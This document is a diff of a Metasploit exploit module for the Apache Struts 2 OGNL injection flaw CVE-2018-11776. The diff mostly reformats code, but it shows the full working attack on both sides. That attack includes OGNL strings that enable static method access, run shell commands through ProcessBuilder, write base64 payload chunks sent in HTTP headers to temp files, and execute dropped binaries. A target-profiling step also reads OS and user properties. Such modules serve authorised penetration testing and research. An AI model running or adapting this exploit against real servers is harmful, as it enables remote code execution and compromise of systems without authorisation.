@@ -10,79 +10,88 @@ class MetasploitModule < Msf::Exploit::Remote
   include Msf::Exploit::EXE
 
   # Eschewing CmdStager for now, since the use of '\' and ';' are killing me
-  #include Msf::Exploit::CmdStager   # https://docs.metasploit.com/docs/development/developing-modules/guides/how-to-use-command-stagers.html
+  # include Msf::Exploit::CmdStager   # https://docs.metasploit.com/docs/development/developing-modules/guides/how-to-use-command-stagers.html
 
   # NOTE: Debugging code has been stripped, but is available in the commit history: a9e625789175a4c4fdfc7092eedfaf376e4d648e
 
   def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'Apache Struts 2 Namespace Redirect OGNL Injection',
-      'Description'    => %q{
-        This module exploits a remote code execution vulnerability in Apache Struts
-        version 2.3 - 2.3.4, and 2.5 - 2.5.16. Remote Code Execution can be performed
-        via an endpoint that makes use of a redirect action.
+    super(
+      update_info(
+        info,
+        'Name' => 'Apache Struts 2 Namespace Redirect OGNL Injection',
+        'Description' => %q{
+          This module exploits a remote code execution vulnerability in Apache Struts
+          version 2.3 - 2.3.4, and 2.5 - 2.5.16. Remote Code Execution can be performed
+          via an endpoint that makes use of a redirect action.
 
-        Note that this exploit is dependant on the version of Tomcat running on
-        the target.  Versions of Tomcat starting with 7.0.88 currently don't
-        support payloads larger than ~7.5kb.  Windows Meterpreter sessions on
-        Tomcat >=7.0.88 are currently not supported.
+          Note that this exploit is dependant on the version of Tomcat running on
+          the target.  Versions of Tomcat starting with 7.0.88 currently don't
+          support payloads larger than ~7.5kb.  Windows Meterpreter sessions on
+          Tomcat >=7.0.88 are currently not supported.
 
-        Native payloads will be converted to executables and dropped in the
-        server's temp dir. If this fails, try a cmd/* payload, which won't
-        have to write to the disk.
-      },
-      'Author'         => [
-        'Man Yue Mo', # Discovery
-        'hook-s3c',   # PoC
-        'asoto-r7',   # Metasploit module
-        'wvu'         # Metasploit module
-      ],
-      'References'     => [
-        ['CVE', '2018-11776'],
-        ['URL', 'https://lgtm.com/blog/apache_struts_CVE-2018-11776'],
-        ['URL', 'https://cwiki.apache.org/confluence/display/WW/S2-057'],
-        ['URL', 'https://github.com/hook-s3c/CVE-2018-11776-Python-PoC'],
-      ],
-      'Privileged'     => false,
-      'Targets'        => [
-        [
-          'Automatic detection', {
-            'Platform'   => %w{ unix windows linux },
-            'Arch'       => [ ARCH_CMD, ARCH_X86, ARCH_X64 ],
-          },
+          Native payloads will be converted to executables and dropped in the
+          server's temp dir. If this fails, try a cmd/* payload, which won't
+          have to write to the disk.
+        },
+        'Author' => [
+          'Man Yue Mo', # Discovery
+          'hook-s3c',   # PoC
+          'asoto-r7',   # Metasploit module
+          'wvu'         # Metasploit module
         ],
-        [
-          'Windows', {
-            'Platform'   => %w{ windows },
-            'Arch'       => [ ARCH_CMD, ARCH_X86, ARCH_X64 ],
-          },
+        'References' => [
+          ['CVE', '2018-11776'],
+          ['URL', 'https://lgtm.com/blog/apache_struts_CVE-2018-11776'],
+          ['URL', 'https://cwiki.apache.org/confluence/display/WW/S2-057'],
+          ['URL', 'https://github.com/hook-s3c/CVE-2018-11776-Python-PoC'],
         ],
-        [
-          'Linux', {
-            'Platform'       => %w{ unix linux },
-            'Arch'           => [ ARCH_CMD, ARCH_X86, ARCH_X64 ],
-            'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/generic'}
-          },
+        'Privileged' => false,
+        'Targets' => [
+          [
+            'Automatic detection', {
+              'Platform' => %w{unix windows linux},
+              'Arch' => [ ARCH_CMD, ARCH_X86, ARCH_X64 ],
+            },
+          ],
+          [
+            'Windows', {
+              'Platform' => %w{windows},
+              'Arch' => [ ARCH_CMD, ARCH_X86, ARCH_X64 ],
+            },
+          ],
+          [
+            'Linux', {
+              'Platform' => %w{unix linux},
+              'Arch' => [ ARCH_CMD, ARCH_X86, ARCH_X64 ],
+              'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/generic' }
+            },
+          ],
         ],
-      ],
-      'DisclosureDate' => '2018-08-22', # Private disclosure = 2018-04-10
-      'DefaultTarget'  => 0))
-
-      register_options(
-        [
-          Opt::RPORT(8080),
-          OptString.new('TARGETURI', [ true, 'A valid base path to a struts application', '/' ]),
-          OptString.new('ACTION', [ true, 'A valid endpoint that is configured as a redirect action', 'showcase.action' ]),
-          OptBool.new('ENABLE_STATIC', [ true, 'Enable "allowStaticMethodAccess" before executing OGNL', true ]),
-        ]
-      )
-      register_advanced_options(
-        [
-          OptString.new('HTTPMethod', [ true, 'The HTTP method to send in the request. Cannot contain spaces', 'GET' ]),
-          OptString.new('HEADER', [ true, 'The HTTP header field used to transport the optional payload', "X-#{rand_text_alpha(4)}"] ),
-          OptString.new('TEMPFILE', [ true, 'The temporary filename written to disk when executing a payload', "#{rand_text_alpha(8)}"] ),
-        ]
+        'DisclosureDate' => '2018-08-22', # Private disclosure = 2018-04-10
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Reliability' => UNKNOWN_RELIABILITY,
+          'Stability' => UNKNOWN_STABILITY,
+          'SideEffects' => UNKNOWN_SIDE_EFFECTS
+        }
       )
+    )
+
+    register_options(
+      [
+        Opt::RPORT(8080),
+        OptString.new('TARGETURI', [ true, 'A valid base path to a struts application', '/' ]),
+        OptString.new('ACTION', [ true, 'A valid endpoint that is configured as a redirect action', 'showcase.action' ]),
+        OptBool.new('ENABLE_STATIC', [ true, 'Enable "allowStaticMethodAccess" before executing OGNL', true ]),
+      ]
+    )
+    register_advanced_options(
+      [
+        OptString.new('HTTPMethod', [ true, 'The HTTP method to send in the request. Cannot contain spaces', 'GET' ]),
+        OptString.new('HEADER', [ true, 'The HTTP header field used to transport the optional payload', "X-#{rand_text_alpha(4)}"]),
+        OptString.new('TEMPFILE', [ true, 'The temporary filename written to disk when executing a payload', "#{rand_text_alpha(8)}"]),
+      ]
+    )
   end
 
   def check
@@ -107,12 +116,12 @@ class MetasploitModule < Msf::Exploit::Remote
       else
         CheckCode::Safe
       end
-    elsif resp && resp.code==400
+    elsif resp && resp.code == 400
       # METHOD 2: Generate two random numbers, ask the target to add them together.
       #   If it does, it's vulnerable.
       a = rand(10000)
       b = rand(10000)
-      c = a+b
+      c = a + b
 
       ognl = "#{a}+#{b}"
 
@@ -127,7 +136,7 @@ class MetasploitModule < Msf::Exploit::Remote
         CheckCode::Safe
       end
     elsif resp.nil?
-      fail_with(Failure::Unreachable,"Target did not respond.  Please double check RHOSTS and RPORT")
+      fail_with(Failure::Unreachable, "Target did not respond.  Please double check RHOSTS and RPORT")
     end
   end
 
@@ -148,7 +157,7 @@ class MetasploitModule < Msf::Exploit::Remote
     #   '\r' ends the GET request prematurely
     #   '\n' ends the GET request prematurely
 
-    bad_chars = %w[; \\ \r \n]    # and maybe '/'
+    bad_chars = %w[; \\ \r \n] # and maybe '/'
     bad_chars.each do |c|
       if ognl.include? c
         print_error("Bad OGNL request: #{ognl}")
@@ -157,28 +166,29 @@ class MetasploitModule < Msf::Exploit::Remote
     end
 
     # The following list of characters *must* be encoded or ORNL will asplode
-    encodable_chars = { "%": "%25",       # Always do this one first.  :-)
-                        " ": "%20",
-                        "\"":"%22",
-                        "#": "%23",
-                        "'": "%27",
-                        "<": "%3c",
-                        ">": "%3e",
-                        "?": "%3f",
-                        "^": "%5e",
-                        "`": "%60",
-                        "{": "%7b",
-                        "|": "%7c",
-                        "}": "%7d",
-                       #"\/":"%2f",       # Don't do this.  Just leave it front-slashes in as normal.
-                       #";": "%3b",       # Doesn't work.  Anyone have a cool idea for a workaround?
-                       #"\\":"%5c",       # Doesn't work.  Anyone have a cool idea for a workaround?
-                       #"\\":"%5c%5c",    # Doesn't work.  Anyone have a cool idea for a workaround?
-                      }
+    encodable_chars = {
+      "%": "%25", # Always do this one first.  :-)
+      " ": "%20",
+      "\"": "%22",
+      "#": "%23",
+      "'": "%27",
+      "<": "%3c",
+      ">": "%3e",
+      "?": "%3f",
+      "^": "%5e",
+      "`": "%60",
+      "{": "%7b",
+      "|": "%7c",
+      "}": "%7d",
+    }
+    # "\/":"%2f",       # Don't do this.  Just leave it front-slashes in as normal.
+    # ";": "%3b",       # Doesn't work.  Anyone have a cool idea for a workaround?
+    # "\\":"%5c",       # Doesn't work.  Anyone have a cool idea for a workaround?
+    # "\\":"%5c%5c",    # Doesn't work.  Anyone have a cool idea for a workaround?
 
-    encodable_chars.each do |k,v|
-     #ognl.gsub!(k,v)                     # TypeError wrong argument type Symbol (expected Regexp)
-      ognl.gsub!("#{k}","#{v}")
+    encodable_chars.each do |k, v|
+      # ognl.gsub!(k,v)                     # TypeError wrong argument type Symbol (expected Regexp)
+      ognl.gsub!("#{k}", "#{v}")
     end
     return ognl
   end
@@ -189,7 +199,7 @@ class MetasploitModule < Msf::Exploit::Remote
     ognl = encode_ognl(ognl)
 
     if headers.nil?
-      headers = {'Keep-Alive': 'timeout=5, max=1000'}
+      headers = { 'Keep-Alive': 'timeout=5, max=1000' }
     end
 
     if payload
@@ -201,9 +211,9 @@ class MetasploitModule < Msf::Exploit::Remote
     uri = normalize_uri(target_uri.path, "/#{ognl}/#{datastore['ACTION']}")
 
     r = send_request_cgi(
-     #'encode'  => true,     # this fails to encode '\', which is a problem for me
-      'uri'     => uri,
-      'method'  => datastore['HTTPMethod'],
+      # 'encode'  => true,     # this fails to encode '\', which is a problem for me
+      'uri' => uri,
+      'method' => datastore['HTTPMethod'],
       'headers' => headers
     )
 
@@ -217,19 +227,20 @@ class MetasploitModule < Msf::Exploit::Remote
   def send_profile
     # Use OGNL to extract properties from the Java environment
 
-    properties = { 'os.name': nil,          # e.g. 'Linux'
-                   'os.arch': nil,          # e.g. 'amd64'
-                   'os.version': nil,       # e.g. '4.4.0-112-generic'
-                   'user.name': nil,        # e.g. 'root'
-                   #'user.home': nil,       # e.g. '/root' (didn't work in testing)
-                   'user.language': nil,    # e.g. 'en'
-                   #'java.io.tmpdir': nil,  # e.g. '/usr/local/tomcat/temp' (didn't work in testing)
-                   }
+    properties = {
+      'os.name': nil, # e.g. 'Linux'
+      'os.arch': nil,          # e.g. 'amd64'
+      'os.version': nil,       # e.g. '4.4.0-112-generic'
+      'user.name': nil,        # e.g. 'root'
+      # 'user.home': nil,       # e.g. '/root' (didn't work in testing)
+      'user.language': nil,
+    } # e.g. 'en'
+    # 'java.io.tmpdir': nil,  # e.g. '/usr/local/tomcat/temp' (didn't work in testing)
 
     ognl = ""
     ognl << %q|(#_memberAccess['allowStaticMethodAccess']=true).| if datastore['ENABLE_STATIC']
     ognl << %Q|('#{rand_text_alpha(2)}')|
-    properties.each do |k,v|
+    properties.each do |k, v|
       ognl << %Q|+(@java.lang.System@getProperty('#{k}'))+':'|
     end
     ognl = ognl[0...-4]
@@ -259,7 +270,7 @@ class MetasploitModule < Msf::Exploit::Remote
       # Separate the colon-delimited properties and store in the 'properties' hash
       s = s.split(':')
       i = 0
-      properties.each do |k,v|
+      properties.each do |k, v|
         properties[k] = s[i]
         i += 1
       end
@@ -282,13 +293,13 @@ class MetasploitModule < Msf::Exploit::Remote
       vprint_warning("Target profiling was unable to determine operating system")
       os = ''
       os = 'windows' if datastore['PAYLOAD'].downcase.include? 'win'
-      os = 'linux'   if datastore['PAYLOAD'].downcase.include? 'linux'
-      os = 'unix'    if datastore['PAYLOAD'].downcase.include? 'unix'
+      os = 'linux' if datastore['PAYLOAD'].downcase.include? 'linux'
+      os = 'unix' if datastore['PAYLOAD'].downcase.include? 'unix'
     end
     return os
   end
 
-  def execute_command(cmd_input, opts={})
+  def execute_command(cmd_input, opts = {})
     # Semicolons appear to be a bad character in OGNL.  cmdstager doesn't understand that.
     if cmd_input.include? ';'
       print_warning("WARNING: Command contains bad characters: semicolons (;).")
@@ -311,7 +322,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     vprint_status("Executing: #{cmd}")
 
-    ognl =  ""
+    ognl = ""
     ognl << %q|(#_memberAccess['allowStaticMethodAccess']=true).| if datastore['ENABLE_STATIC']
     ognl << %Q|(#p=new java.lang.ProcessBuilder(#{cmd})).|
     ognl << %q|(#p.redirectErrorStream(true)).|
@@ -361,7 +372,7 @@ class MetasploitModule < Msf::Exploit::Remote
     # d = payload data
     # f = path to temp file
     # s = stream/handle to temp file
-    ognl  = ""
+    ognl = ""
     ognl << %q|(#_memberAccess['allowStaticMethodAccess']=true).| if datastore['ENABLE_STATIC']
     ognl << %Q|(#d=@org.apache.struts2.ServletActionContext@getRequest().getHeader('#{data_header}')).|
     ognl << %Q|(#f=@java.io.File@createTempFile('#{random_filename}','.tmp')).|
@@ -370,7 +381,7 @@ class MetasploitModule < Msf::Exploit::Remote
     ognl << %q|(#s=new java.io.FileOutputStream(#f)).|
     ognl << %q|(#d=new sun.misc.BASE64Decoder().decodeBuffer(#d)).|
     ognl << %q|(#s.write(#d)).|
-    #TODO: Consider GZIP: ognl << %q|(#s.write(java.util.zip.GZIPInputStream(#d).read())).|
+    # TODO: Consider GZIP: ognl << %q|(#s.write(java.util.zip.GZIPInputStream(#d).read())).|
     ognl << %q|(#s.close()).|
     ognl << %q|(#p=new java.lang.ProcessBuilder({#f.getAbsolutePath()})).|
     ognl << %q|(#p.start()).|
@@ -395,7 +406,7 @@ class MetasploitModule < Msf::Exploit::Remote
     filename = datastore['TEMPFILE']
 
     # f = path to temp file
-    ognl  = ""
+    ognl = ""
     ognl << %q|(#_memberAccess['allowStaticMethodAccess']=true).| if datastore['ENABLE_STATIC']
     ognl << %Q|(#f=@java.io.File@createTempFile('#{filename}','.exe')).|
     ognl << %q|(#f.setExecutable(true)).|
@@ -406,12 +417,12 @@ class MetasploitModule < Msf::Exploit::Remote
 
     begin
       tempfile = r.headers['Location']
-      tempfile = tempfile[1..-(2+datastore['ACTION'].length)]
+      tempfile = tempfile[1..-(2 + datastore['ACTION'].length)]
       if tempfile.empty?
-        fail_with(Failure::UnexpectedReply,"Unable to create and locate file on target.  Try a cmd/*/generic payload")
+        fail_with(Failure::UnexpectedReply, "Unable to create and locate file on target.  Try a cmd/*/generic payload")
       end
     rescue
-      fail_with(Failure::UnexpectedReply,"Unable to create and locate file.  Try a cmd/*/generic payload")
+      fail_with(Failure::UnexpectedReply, "Unable to create and locate file.  Try a cmd/*/generic payload")
     end
 
     return tempfile
@@ -424,10 +435,10 @@ class MetasploitModule < Msf::Exploit::Remote
     payload_cursor = 0
 
     while payload_cursor < payload.length
-      payload_size  = rand(4500..5000)      #  payload_size cannot exceed 5645 in my testing
+      payload_size = rand(4500..5000) #  payload_size cannot exceed 5645 in my testing
       payload_start = payload_cursor
-      payload_end   = payload_cursor + payload_size
-      payload_end   = payload.size if payload_end > payload.size
+      payload_end = payload_cursor + payload_size
+      payload_end = payload.size if payload_end > payload.size
 
       chunk_bin = payload[payload_start..payload_end]
       chunk_b64 = [chunk_bin].pack("m").delete("\n")
@@ -446,12 +457,12 @@ class MetasploitModule < Msf::Exploit::Remote
     headers = {
       "#{data_header}": payload_chunk,
       "#{file_header}": payload_file,
-      }
+    }
 
     # d = payload data
     # f = path to temp file
     # s = stream/handle to temp file
-    ognl  = ""
+    ognl = ""
     ognl << %q|(#_memberAccess['allowStaticMethodAccess']=true).| if datastore['ENABLE_STATIC']
     ognl << %Q|(#d=@org.apache.struts2.ServletActionContext@getRequest().getHeader('#{data_header}')).|
     ognl << %Q|(#f=@org.apache.struts2.ServletActionContext@getRequest().getHeader('#{file_header}')).|
@@ -480,11 +491,11 @@ class MetasploitModule < Msf::Exploit::Remote
     file_header = datastore['HEADER'] + 'f'
     headers = {
       "#{file_header}": file,
-      }
+    }
 
     # f = path to temp file
     # p = process handle
-    ognl =  ""
+    ognl = ""
     ognl << %q|(#_memberAccess['allowStaticMethodAccess']=true).| if datastore['ENABLE_STATIC']
     ognl << %Q|(#f=@org.apache.struts2.ServletActionContext@getRequest().getHeader('#{file_header}')).|
     ognl << %q|(#p=new java.lang.ProcessBuilder(#f)).|
@@ -496,7 +507,7 @@ class MetasploitModule < Msf::Exploit::Remote
     r = send_struts_request(ognl, headers: headers)
 
     begin
-      if r.code==302
+      if r.code == 302
         print_good("OGNL payload executed successfully.")
       else
         fail_with(Failure::PayloadFailed, "Target did not successfully execute the request")
